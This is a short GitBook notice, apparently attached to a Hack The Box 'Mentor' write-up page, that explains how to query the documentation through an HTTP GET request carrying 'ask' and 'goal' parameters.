Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-mentor.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `build a script that syncs our docs to a CMS` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
